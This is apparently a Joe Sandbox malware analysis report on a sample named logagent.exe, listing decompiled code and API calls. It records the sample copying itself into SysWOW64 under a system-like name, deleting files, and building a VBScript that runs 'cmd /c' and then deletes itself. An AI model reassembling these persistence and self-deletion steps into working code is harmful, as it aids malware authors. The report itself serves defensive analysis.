                                  			E004124A0(intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
                                  				intOrPtr _t6;
                                  				intOrPtr _t7;
                                  				intOrPtr* _t10;
                                  
                                  				_t10 = _a4;
                                  				_t6 = _a8;
                                  				asm("cpuid");
                                  				 *_t10 = _t6;
                                  				 *((intOrPtr*)(_t10 + 4)) = _t7;
                                  				 *((intOrPtr*)(_t10 + 8)) = 0;
                                  				 *((intOrPtr*)(_t10 + 0xc)) = __edx;
                                  				return _t6;
                                  			}

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                  • Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
                                  • Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                  • Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                    • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                    • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                    • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                    • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                    • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                    • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AF9F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFB2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFBB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFC4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFCD
                                  • Sleep.KERNEL32(00000064), ref: 0040AFDD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AFE6
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AFFA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B00C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B019
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B026
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B030
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B043
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B04C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B055
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B066
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B07D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B08F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B09C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B0A9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B0B3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0C7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0E2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B0EB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B0FF
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B111
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B11E
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B12B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B135
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B149
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B152
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B15B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B164
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B196
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(7620F560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,7620F560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1AF
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B1B6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1C5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1E1
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B1E8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1F1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B20A
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B211
                                  • Sleep.KERNEL32(000001F4), ref: 0040B22A
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415B14), ref: 0040B243
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,0041B310,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B28B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B29B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B2AB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?), ref: 0040B2B8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000), ref: 0040B2C5
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040B2D2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2DF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000069), ref: 0040B300
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B309
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B312
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B31B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B327
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B333
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B33F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2E9
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B408
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B411
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B41D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B426
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B42F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B43B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B447
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B450
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B459
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B462
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B46B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B474
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@G@std@@$??1?$basic_string@$D@2@@std@@$G@2@@std@@$V?$basic_string@$Hstd@@$?c_str@?$basic_string@$G@2@@0@V10@0@$??0?$basic_string@$D@2@@0@$D@1@@File$G@1@@V10@V10@@$Delete$SleepV01@@rand$??8std@@CreateModuleNameV01@Y?$basic_string@srandtime
                                  • String ID: /stext "
                                  • API String ID: 1338134179-3856184850
                                  • Opcode ID: 935c2ce95a8cb78159c839ce4c4cda60361ab1ff26450eff623e928e592d347b
                                  • Instruction ID: be4b94b66ba9b0bd8820f021ae38252d46d58d745cb1822e142cef95b78b0ffe
                                  • Opcode Fuzzy Hash: 935c2ce95a8cb78159c839ce4c4cda60361ab1ff26450eff623e928e592d347b
                                  • Instruction Fuzzy Hash: 4D02EDB2C0050DEBDB05EBE0EC59EDE7B7CAF54345F04806AF516A3091EB745689CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • wcslen.MSVCRT ref: 00407E46
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407EC2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                  • wcscmp.MSVCRT ref: 00407EE0
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407F1D
                                  • CopyFileW.KERNEL32(C:\Windows\SysWOW64\logagent.exe,00000000), ref: 00407F25
                                  • wcslen.MSVCRT ref: 00407F40
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00415A24,?), ref: 00407F65
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415A24,?), ref: 00407F72
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F7D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F86
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F8F
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FAB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407FB4
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407FBE
                                  • CopyFileW.KERNEL32(C:\Windows\SysWOW64\logagent.exe,00000000), ref: 00407FC6
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(C:\Windows\SysWOW64\logagent.exe), ref: 00407FD3
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407FE5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408010
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 0040801D
                                  • wcslen.MSVCRT ref: 00408022
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408034
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 0040803B
                                  • _wgetenv.MSVCRT ref: 0040804B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408056
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408061
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040806C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(WScript.Sleep 1000,?), ref: 0040807E
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject")), ref: 0040808C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Windows\SysWOW64\logagent.exe,?,00415628,0041623C), ref: 004080B0
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ,?,00415628,00000000), ref: 004080C4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080CF
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004080DC
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080E9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080F6
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408102
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040810B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408114
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040811D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408126
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040812F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408138
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 0040814B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,0041BA28,00000000), ref: 00408163
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040816E
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040817B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408188
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408194
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040819D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081A6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081AF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081B8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081C1
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 004081CF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081DB
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004081E5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081F1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040820F
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040821C
                                  • exit.MSVCRT ref: 00408228
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408231
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040823A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
